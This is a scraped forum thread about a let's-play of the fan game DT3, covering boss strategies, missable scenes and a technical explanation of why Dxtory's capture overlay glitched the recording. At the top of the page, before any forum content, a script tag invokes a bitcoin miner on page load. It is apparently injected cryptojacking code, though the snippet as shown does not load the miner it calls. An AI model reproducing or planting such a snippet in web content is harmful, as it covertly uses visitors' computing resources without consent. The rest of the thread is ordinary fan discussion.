<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectmario fan games galaxy

DT3 - raocow and the game that ended

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
ZephyrBurst
A Bird Cat
Posts: 358
Joined: 8 years ago
Pronouns: He
Location: Austin, TX

Re: DT3 - raocow blows up a lot of robots

Postby ZephyrBurst » 4 years ago

I'm assuming dxtory gets its data from the video driver and then does... something? That would be why there was the hall of mirrors effect in the Pete room. It's one of maybe 2 maps in the game that isn't using some sort of image for a background and instead is filling the background with a color. I'm guessing whatever setting you had didn't agree with that. The dark maps require use of your gpu to do that light effect, though why dxtory hooking into your video drivers not allowing that is weird.
Horikawa Otane wrote:
raocow wrote:(Also fun DT3 thing - it would run at 5fps and be unplayable unless I started it without my MOUSE plugged in. Then I could plug my mouse back in once the game had been started. See - "creative" coding)
That can happen with nearly any pre-studio game maker game in my experience. It's bizarre. Usually it's the reverse though with usb controllers. Unplugging them will kill framerate on some machines.

User avatar
Sebby19
Posts: 2564
Joined: 11 years ago
Location: Winnipeg, Manitoba

Re: DT3 - raocow blows up a lot of robots

Postby Sebby19 » 4 years ago

raocow wrote:don't worry pyro she's talking about soldexus
Oh come on!
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Rednaxela
Maker of Shenanigans
Posts: 792
Joined: 6 years ago

Re: DT3 - raocow blows up a lot of robots

Postby Rednaxela » 4 years ago

ZephyrBurst wrote:I'm assuming dxtory gets its data from the video driver and then does... something? That would be why there was the hall of mirrors effect in the Pete room. It's one of maybe 2 maps in the game that isn't using some sort of image for a background and instead is filling the background with a color.
Dxtory, as well as Fraps, and OBS in "game capture" mode (and I'm sure some others), all work by dynamically inserting a hook into the game's code, such that right before the directx or opengl call it makes to flip the back/front buffers, it will run a directx/opengl call to read the frame from video memory to shared memory that the capture program reads out of. That capture itself isn't what likely interfered with things, that's pretty harmless normally. This method of inserting a hook in the game's code that catches when it flips the front/back buffer is nice because it allows the capture software the match the frame rate of the game perfectly. Other screen capture methods (i.e. OBS in "window capture" mode) that don't do it this way, can't synchronize to the game engine's frame rate so things might not be quite as smooth/consistent.

In order to do an overlay of capture status, some of these types of software will also use this *same* hook to render their own HUD ontop of everything else using some directx/opengl calls. This rendering of the capture software's HUD during the capture hook is what messed things up. It seems that dxtory's HUD rendering code didn't clean up after itself very well, and left things in a state that is incompatible with Game Maker's method of rendering a color as background at the start of the next frame. This consequently causes the background to not be redrawn there, both on screen and in capture.

Also, the HUD showing in the recording during screen transitions, likely means that Game Maker was flipping the front/back buffers during those screen transitions without actually clearing/redrawing the framebuffer, which is a bit of an odd engine behaviour though perfectly valid. Dxtory and such software avoids capturing it's own HUD by only drawing the HUD after it captured the frame it's drawing the HUD onto... but... if the engine doesn't redraw anything and keeps flipping frames, the capture software will go and capture it's own HUD when the next frame comes around.


Random note, Steam Overlay, and most VOIP software in-game overlays, all work very similarly to this as well by inserting a hook in the running game's code too in order to render themselves. These also present similar potential issues if they fail to clean up after themselves well when rendering their overlay.

User avatar
MonkeyShrapnel
Poke a Man
Posts: 401
Joined: 7 years ago
First name: Brian
Pronouns: he/him/his
Location: Canada Eh?
Contact:

Re: DT3 - raocow blows up a lot of robots

Postby MonkeyShrapnel » 4 years ago

That boss was pretty unique, I liked how it made you take advantage of all your weapons to take it out.

Also, Smash Bros music during the fight for some reason? I dig it though.
Uh...Do I just sign here? What do you mean it should be obvious? There are people in this world...well...a whole lot of people that can't follow basic instructions!

Image
Image

My silly "Collab" Youtube channel https://www.youtube.com/user/Theguyswho ... s/featured
(That means I'm the only person using it nowadays.)

User avatar
jaxter0987
Posts: 165
Joined: 11 years ago
Location: United States

Re: DT3 - raocow blows up a lot of robots

Postby jaxter0987 » 4 years ago

You had a much easier time with Decimator 10000 than most of us gave you credit for. And I'm glad you ended up realizing that a charged Spazer Beam shot upwards on the totem section makes that section hilariously easy, even more so now that the Spazer Beam is buffed compared to when I fought the Decimator. One thing you never did was actually scan the armor portion of the Decimator. You needed to click on the edges of the sprite to highlight the armor instead of the Decimator itself.

And then Decimator 20000 comes along and you breeze right through that as well. raocow once again, shows that he'll breeze through the difficult parts and yet stumble on the simplest parts.

Because I didn't expect the Decimator fights to go this smoothly, I didn't explain ahead of time. If you want to see everything the game has to offer, you don't want to do the Abomination now. You'll want to wait until you almost get to the point of no return. Make a save there and then go past that point without handling the Abomination business. Then go back and handle things before going past the point of no return.

It should be pretty obvious where that point in the game is when you get to that map, but I'll try to remind you preemptively.

What I was talking about in my last post was how I felt the flow of the story should be like. Since you probably want to see everything, just keep on going with the Dragoon section.
Image

NegativeZeroZ
The Living Travesty
Posts: 229
Joined: 7 years ago

Re: DT3 - raocow blows up a lot of robots

Postby NegativeZeroZ » 4 years ago

There's a missable cutscene that reminds you that you need to fight the Abomination. It's kinda big thing that people will want to see though.
Image

User avatar
Stink Terios
Posts: 577
Joined: 8 years ago

Re: DT3 - raocow blows up a lot of robots

Postby Stink Terios » 4 years ago

Decimator is the best! Such an amazing fight! Also, not very hard.

Also I love Kirby's little trick. There is, in fact, no way Kirby would get chumped by Hexor like that.

User avatar
Lostsoldier20
I am.
Posts: 323
Joined: 4 years ago
Location: United States

Re: DT3 - raocow blows up a lot of robots

Postby Lostsoldier20 » 4 years ago

jaxter0987 wrote:And then Decimator 20000 comes along and you breeze right through that as well. raocow once again, shows that he'll breeze through the difficult parts and yet stumble on the simplest parts.
Nah, I expected this one to go well. Like this boss is super crazy but a crazy raocow can get behind. It's also a good kind of crazy, given the foreshadowing it got. (one whole NPC before they all got killed in the sanctuary) But it is all on the crazy side, as for everything going on, both fights are pretty short affairs. Also, I agree on the note of John helping being cool, as he didn't have much of an active role til now. For all his idling, he ends up bringing a giant mech and a rapid-fire bazooka.

Meanwhile, all remaining bosses (not including anything in the Dragoon section) fall under my category of "purposefully take an episode 0 for purely practicing it." So either the

3+ hours

I spent on each of the bosses means raocow will absolutely 100% need a 0, and maybe once twice, or he's going to beat them all first try.

Also Hex didn't kill Kirby! Yay! He's still dead! Y-yay!...?
I'm an idiot who likes vidya games.
And also maybe makes bad decisions based on those vidya games.

User avatar
jaxter0987
Posts: 165
Joined: 11 years ago
Location: United States

Re: DT3 - raocow blows up a lot of robots

Postby jaxter0987 » 4 years ago

Lostsoldier20 wrote:Also Hex didn't kill Kirby! Yay! He's still dead! Y-yay!...?
I mean, he might as well have killed them, as due to his release of the Virus, Mario, Luigi, Link, Belmont, Megaman, Samus and Kirby all sacrificed themselves to save the world. But at least Kirby died on his terms rather than Hex's.

I don't know, raocow managed to make the section where John was shooting sireballs super short as he got the Decimator to stay relatively still whenever John used the sudden fireball spam. I never managed to time it right so that entire section took forever. Its the same thing when John does the bazooka barrage. raocow unintentionally got the timings right and so the Decimator died pretty quickly.
Image

User avatar
Sebby19
Posts: 2564
Joined: 11 years ago
Location: Winnipeg, Manitoba

Re: DT3 - raocow blows up a lot of robots

Postby Sebby19 » 4 years ago

MonkeyShrapnel wrote:That boss was pretty unique, I liked how it made you take advantage of all your weapons to take it out.
Though inspite of that, he barely used his whole arsenal.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
ano0maly
Discord User
Posts: 2189
Joined: 9 years ago

Re: DT3 - raocow blows up a lot of robots

Postby ano0maly » 4 years ago

This video just got me annoyed, honestly.

As mentioned, the Decimator Armor has a separate scan info; you needed to scan the edge of the armor, which does not overlap with the boss itself. Because he didn't read the scan, he missed out on the fact that the explosion-type bombs do 3x damage to the armor and are very effective weapons against the large bunker. It annoyed me because I knew it wasn't raocow's fault, it was the fault of the game. This is kind of luck-based; if you get unlucky and scan the center, you get the scan for the Decimator 10000 instead of its armor, and you'll probably assume that the armor doesn't have scan descriptions since you just tried it and it didn't work. So you'll miss out.

And I don't know what the point of that request for the Gate H description was. It's identical to the engraved message in Sacred Temple that raocow showed when he finished the gate. And this was made known since shortly after Gate A. Also what about my request raocow?

It's a shame too, since this is one of my favorite bosses in the game, given how exciting it is to unleash your many weapons rapidly.
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
Sebby19
Posts: 2564
Joined: 11 years ago
Location: Winnipeg, Manitoba

Re: DT3 - raocow blows up a lot of robots

Postby Sebby19 » 4 years ago

ano0maly wrote:And I don't know what the point of that request for the Gate H description was. It's identical to the engraved message in Sacred Temple that raocow showed when he finished the gate. And this was made known since shortly after Gate A. Also what about my request raocow?
Sorry, thats my fault. I realized my mistake as soon as Rao hovered over Nightmare A. I had forgotten that detail.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
TaviTurnip
Reach for the top
Abministrator
Posts: 1029
Joined: 10 years ago
First name: Rena
Location: The pinnacle

Re: DT3 - raocow blows up a lot of robots

Postby TaviTurnip » 4 years ago

jaxter0987 wrote:And then Decimator 20000 comes along and you breeze right through that as well. raocow once again, shows that he'll breeze through the difficult parts and yet stumble on the simplest parts.
I have to agree that 20000 looked way simpler. No Hidden Missiles was enough on its own. It looked like almost a "purposely not loseable" boss, compared to 10000.

That boss was super cool overall though! I have to ask though, are the red Touhou lasers necessary? I can see why they are during 20000, but during 10000 they seem to be there purposely to deter something. Is Zephyr's intended method to avoid the lasers entirely and not dash through them? It just seems odd to have only the middle volley be red.
I regularly stream on Twitch! with other members of the talkhaus. Come watch on Tuesdays and Saturdays if you like Splatoon, Pokémon, and other RPGs!

User avatar
Dark Hunter
Posts: 277
Joined: 8 years ago
Location: New Mexico, USA

Re: DT3 - raocow and the neverending game

Postby Dark Hunter » 4 years ago

Speaking from my own experience, I was kind of burnt out by my effort against Decimator 10000, which probably made Decimator 20000 seem harder than it is. And I don't take breaks mid-boss because I'm not a casul I'm never sure if mid-boss checkpoints are things you can quit the game and then restart at.

NegativeZeroZ
The Living Travesty
Posts: 229
Joined: 7 years ago

Re: DT3 - raocow and the neverending game

Postby NegativeZeroZ » 4 years ago

Dark Hunter wrote:I'm never sure if mid-boss checkpoints are things you can quit the game and then restart at.
I had to fight really hard for that one, but you can. I wrote Zephyr a wall of text detailing all of the game's annoying inconsistencies with regards to the checkpoints, so they were all flattened out in the end, except that some checkpoints still heal you while others don't.
ano0maly wrote:Also what about my request raocow?
What, to go all the way back to Subcon to scan enemies we'll never see again? Or to demo a weapon in a dungeon with no real enemies in it?

Checking some text on the map was hardly a pace-destroying request, there's no need to be mad about it.

If it bothers you so much that the viewers won't see the scan datas, you can post them yourself as you've done before.
Image

User avatar
ano0maly
Discord User
Posts: 2189
Joined: 9 years ago

Re: DT3 - raocow and a castle but it's not Roy's one

Postby ano0maly » 4 years ago

ano0maly wrote: And raocow I would like to see you try out the Gravity Displacer that you bought in today's video. Give it a try near an enemy and you might like it.
Not very difficult to try out either
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
ZephyrBurst
A Bird Cat
Posts: 358
Joined: 8 years ago
Pronouns: He
Location: Austin, TX

Re: DT3 - raocow blows up a lot of robots

Postby ZephyrBurst » 4 years ago

TaviTurnip wrote:
jaxter0987 wrote:That boss was super cool overall though! I have to ask though, are the red Touhou lasers necessary? I can see why they are during 20000, but during 10000 they seem to be there purposely to deter something. Is Zephyr's intended method to avoid the lasers entirely and not dash through them? It just seems odd to have only the middle volley be red.
Without those, the standard circle of lasers + ceiling missiles aren't a threat at all. The red lasers force a very precise dodge if you want to remain close, which really isn't necessary unless you want to go for the fastest possible time.

User avatar
raekuul
D&C 134:2
Posts: 1107
Joined: 11 years ago
First name: Pokota
Pronouns: he/him/his
Location: Literal Cincinnati
Contact:

Re: DT3 - raocow and the neverending game

Postby raekuul » 4 years ago

raocow wrote:
What are your settings in DXTory on this page?
Image
I do streams sometimes
SnoruntPyro played my MaGLX2 level
Image
And now to reveal my rejected names: Darth Vader's Tough Savannah Mansion in Canada's Chapter

User avatar
Willhart
Stalker, Doxxer, and Sexual Harasser
Banned
Posts: 2520
Joined: 9 years ago
Location: Finland

Re: DT3 - raocow and the neverending game

Postby Willhart » 4 years ago

raekuul wrote:
raocow wrote:
What are your settings in DXTory on this page?
Would be interesting to see if it different from what I have too. Also the more Lagarith has it's own settings there too.

User avatar
raocow
the death of the incredible huge
Posts: 3285
Joined: 11 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: DT3 - raocow and the neverending game

Postby raocow » 4 years ago

pretty much that except I record at 30fps and I got some settings for clipping, which is necessary du to a large black border if you record straight from the game
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
raekuul
D&C 134:2
Posts: 1107
Joined: 11 years ago
First name: Pokota
Pronouns: he/him/his
Location: Literal Cincinnati
Contact:

Re: DT3 - raocow and the neverending game

Postby raekuul » 4 years ago

Hm, the ghosting might be a codec thing then question mark? What codec are you using and what settings are those at?

For the folks playing along at home, I do not recommend recording with DXTory using a lossless codec like Lagarith unless you re-encode lossy in post-processing, as Lossless is HUGE.

E:
Willhart Idolized Lovely Lollipops Handling Arbitrarily Rated Tasks wrote:Also the more Lagarith has it's own settings there too.
Image
I can choose to use null frames (if a frame is identical to the previous frame it becomes a placeholder 'frame' that just says "copy the previous frame". I don't like doing since it screwed up a Sonic 1 encode for someone else once, and not everything supports how LAGS does these pseudo b-frames), enable/disable MT, and prevent upsampling when decoding (which I'm not sure what that does) and I can choose my color space. That's the extent of the extra options in LAGS.

E2:
raocow wrote:pretty much that except I record at 30fps and I got some settings for clipping, which is necessary du to a large black border if you record straight from the game
I have literally never had that. Theoretically DXTory should only be able to see the inside of the game window and not generate black borders that don't exist. What game(s) does it do that to you on, and do those games already have black borders?
(Caveat: I also literally never record from fullscreen, so that might be why I've never seen it)
I do streams sometimes
SnoruntPyro played my MaGLX2 level
Image
And now to reveal my rejected names: Darth Vader's Tough Savannah Mansion in Canada's Chapter

User avatar
Rednaxela
Maker of Shenanigans
Posts: 792
Joined: 6 years ago

Re: DT3 - raocow and the neverending game

Postby Rednaxela » 4 years ago

raekuul wrote:Hm, the ghosting might be a codec thing then question mark? What codec are you using and what settings are those at?
What do you mean by ghosting? Do you mean the Pete fight thing, or the HUD showing during transitions? It's been noted several times that that has already been fixed. Also, I gave a detailed explanation of why exactly it was happening earlier on this page. Or do you mean something different?

User avatar
raekuul
D&C 134:2
Posts: 1107
Joined: 11 years ago
First name: Pokota
Pronouns: he/him/his
Location: Literal Cincinnati
Contact:

Re: DT3 - raocow and the neverending game

Postby raekuul » 4 years ago

The Pete room thing and the DXTory overlay both. I'm only just now getting caught up on the DT3 videos so I'm a little behind the times. I more-or-less came straight to the thread and bypassed everything since page 29, and sort-of glossed over your post explaining why you should never ever enable "include overlay." Still curious about the encoder "codec" settings though.
It's not actually being used as a codec since all it's doing is encoding the video, but we have to use the word that the devs put there since that's what will be looked for...
Also, I never knew that about how game capture works. That would explain why OBS crashed a week or so ago when I did Game Capture on a window that Discord had hooked into.
I do streams sometimes
SnoruntPyro played my MaGLX2 level
Image
And now to reveal my rejected names: Darth Vader's Tough Savannah Mansion in Canada's Chapter

User avatar
RobinLSL
Posts: 117
Joined: 11 years ago
Location: Paris, France

Re: DT3 - raocow and the neverending game

Postby RobinLSL » 4 years ago

Not sure why everyone is impressed by raoman's performance on the Decimator fights... Apart from showing some nice Morph Ball dodging, I think he showed that this boss really isn't super hard or anything. Not to discredit him or anything, but yeah the piercing Spazer shots do wreck a few of those phases.

User avatar
ano0maly
Discord User
Posts: 2189
Joined: 9 years ago

Re: DT3 - raocow and the neverending game

Postby ano0maly » 4 years ago

raekuul wrote: Also, I never knew that about how game capture works. That would explain why OBS crashed a week or so ago when I did Game Capture on a window that Discord had hooked into.
...Does no one try OBS Monitor Capture?
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest


Return to “let's play”

Who is online

Users browsing this forum: Sanct and 19 guests